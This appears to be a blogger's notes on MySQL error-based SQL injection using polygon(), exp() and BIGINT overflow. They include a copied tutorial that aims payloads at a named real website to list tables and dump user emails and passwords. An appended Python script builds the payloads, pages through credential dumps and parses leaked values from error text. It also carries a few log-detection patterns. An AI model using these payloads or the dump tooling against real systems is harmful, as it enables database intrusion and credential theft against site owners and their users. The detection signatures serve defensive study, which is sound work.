http://frostyhacks.blogspot.kr/2014/10/one-sqli-to-rule-them-all.html
SQL statements can be executed inside polygon().
mysql> select POLYGON(12.33 12.55,13.55; select id from prob;);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12.55,13.55' at line 1
+-------+
| id    |
+-------+
| guest |
| admin |
+-------+
2 rows in set (0.00 sec)
But since ordinary functions like PHP's mysql_query() cannot execute more than one query, this probably isn't very meaningful.
The main subject that prompted this post is below.
Error-based SQLi is possible with polygon().
http://frostyhacks.blogspot.kr/2014/11/error-you-have-sqli-in-your-polygons.html
This looks like it would be extremely useful, but it doesn't work on my current version, 5.1.41.
http://ethicalhacking786.blogspot.kr/2015/05/Error-base-tutorials.html
See also.
https://rstforums.com/forum/94842-sqli-polygons.rst
And here.
They all say the same error appears, but for me it doesn't (I get a NULL value or just a syntax error).
Addendum.
The version probably needs to be 5.5 or higher.
It sounds like SQLi is also possible with MULTILINESTRING and GEOMETRYCOLLECTION, but that doesn't work on my current MySQL version either.
I've copied the whole page here for future reference.
Maybe some of you have heard, or maybe not, but there's a new type of error-based injection in MySQL.
Discovered about a week ago.
This method is called "non-geometric error based".
Let's start.
This method is based on the function polygon().
In a nutshell, this function constructs a geometry collection.
The vulnerable thing about it is that it can only work with the function point().
For example:
SELECT polygon(point(53,12));
Not really exciting, eh?
For those who know a bit of geometry, it goes like point(x,y).
Now look at what happens when we don't use point():
SELECT polygon(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing
So let's think a bit.
If the error returns our string input as the string output, what would happen if we try to run a query?
SELECT polygon((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing
Conditions:
mysql_error on.
Let's get the version:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))
Nice, but can we extract more?
Hell yeah.
We will be using this to get tables:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
I'm interested in the table pernoduser, so let's get the columns:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))
And dump the table:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))
To get past the truncated results, we can just add a condition at the end: " where email>last-email ".
Hope you learned something.
There's one more.
Apparently error-based SQL injection is also possible using exp(). The drawback is that the MySQL version must be 5.5.5 or higher.
https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
Below is error-based injection using integer overflow. The exp() injection method above was built on top of this.
https://osandamalith.wordpress.com/2015/07/08/bigint-overflow-error-based-sql-injection/
mysql> select ~0+!(select*from(select user())x);
ERROR 1690 (22003): BIGINT value is out of range in '(~(0) + (not((select 'root@localhost' from dual))))'
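As an added worked example (not code from the frostyhacks post, from Osanda Malith's posts, or from these notes), the Python below builds the three payload shapes covered on this page, polygon() with its double-nested SELECT, exp(~...) and the ~0+! BIGINT overflow, and parses the leaked value back out of the MySQL error lines quoted above, which is the step a tester repeats for every column and chunk. It also carries the "where email>last-email" paging trick from the copied post. The function names, the dump helper and the constructed group_concat error line are assumptions for illustration; the other three sample errors are the page's own text.

```python
"""Payload builders and error-text extractors for the MySQL error-based
injection tricks in these notes: polygon() (ERROR 1367), exp() and BIGINT
overflow (both ERROR 1690). Added example, not the original authors' code.
Names and the "dump" sample error are assumptions for illustration."""
import re
from typing import Optional

# Derived-table aliases, innermost first. The polygon() payloads on the page
# nest the SELECT twice ("...f)x)"), the exp()/BIGINT ones once ("...x)").
_ALIASES = ["f", "x"]


def nest(subquery: str, depth: int = 2) -> str:
    """Wrap a SELECT in `depth` derived tables so the server's error text
    prints the materialised value instead of the raw expression."""
    expr = subquery
    for alias in _ALIASES[-depth:]:
        expr = f"select*from({expr}){alias}"
    return f"({expr})"


def polygon_payload(subquery: str, func: str = "polygon") -> str:
    """Non-geometric error: polygon(<nested select>) raises ERROR 1367 and
    echoes the value. The notes say MULTILINESTRING/GEOMETRYCOLLECTION may
    also work (unverified there); pass them as `func` if you want to try."""
    return f"{func}({nest(subquery, 2)})"


def exp_payload(subquery: str) -> str:
    """exp(~x): a non-numeric string casts to 0, ~0 is 2**64-1, exp() of that
    overflows DOUBLE and ERROR 1690 echoes x (MySQL 5.5.5+ per the notes)."""
    return f"exp(~{nest(subquery, 1)})"


def bigint_payload(subquery: str) -> str:
    """~0 + !x: !x is 1 for a string that casts to 0, adding it to 2**64-1
    overflows BIGINT and ERROR 1690 echoes x."""
    return f"~0+!{nest(subquery, 1)}"


def dump_subquery(table: str, cols, key: str, after: Optional[str] = None) -> str:
    """group_concat() dump of `cols` joined by ':' (0x3a), with the copied
    post's 'where key > last value' trick to page past the length cap."""
    sql = f"select group_concat({',0x3a,'.join(cols)}) from {table}"
    if after is not None:
        safe = after.replace("'", "''")  # assumes a numeric injection point
        sql += f" where {key}>'{safe}'"
    return sql


# MySQL prints the materialised row as (select '<value>' [AS `name`] from
# dual); the AS part shows up for @@version on the page, not for user().
_LEAK_RE = re.compile(r"\(select '(.*?)'(?: AS `[^`]*`)? from dual\)")

# Signatures a log or WAF rule can key on; 1367 and 1690 are server codes.
_SIGNATURES = {
    "polygon": re.compile(r"ERROR 1367 .*Illegal non geometric", re.I),
    "exp": re.compile(r"ERROR 1690 .*DOUBLE value is out of range", re.I),
    "bigint": re.compile(r"ERROR 1690 .*BIGINT value is out of range", re.I),
}


def classify(error_text: str) -> Optional[str]:
    """Name the technique an error line belongs to, or None."""
    for name, rx in _SIGNATURES.items():
        if rx.search(error_text):
            return name
    return None


def extract_leak(error_text: str) -> Optional[str]:
    """Pull the echoed value out of the error, or None if it is not there.
    A value containing a single quote is cut short: check those by hand."""
    m = _LEAK_RE.search(error_text)
    return m.group(1) if m else None


def split_dump(leak: str):
    """Turn an 'email:password,email:password' group_concat leak into pairs."""
    return [tuple(row.split(":", 1)) for row in leak.split(",") if row]


# First three are quoted from the page; "dump" is constructed to show the
# group_concat shape the dump step would produce.
SAMPLE_ERRORS = {
    "polygon": "Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` "
               "from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value "
               "found during parsing",
    "exp": "ERROR 1690 (22003): DOUBLE value is out of range in "
           "'exp(~((select 'root@localhost' from dual)))'",
    "bigint": "ERROR 1690 (22003): BIGINT value is out of range in "
              "'(~(0) + (not((select 'root@localhost' from dual))))'",
    "dump": "Error 1367 (22007): Illegal non geometric '(select `x`.`g` from "
            "(select 'a@x.io:h1,b@x.io:h2' AS `g` from dual) `x`)' value "
            "found during parsing",
}

if __name__ == "__main__":
    for name, err in SAMPLE_ERRORS.items():
        print(name, classify(err), extract_leak(err))
    print(polygon_payload(dump_subquery("pernoduser", ["email", "password"], "email")))
```

The same regex serves all three techniques because the leak is always printed as a materialised `select '<value>' ... from dual`; only the error code and the surrounding operator text differ, which is what `classify()` keys on, and those two strings in application error logs are a reliable detection signal for this class of injection.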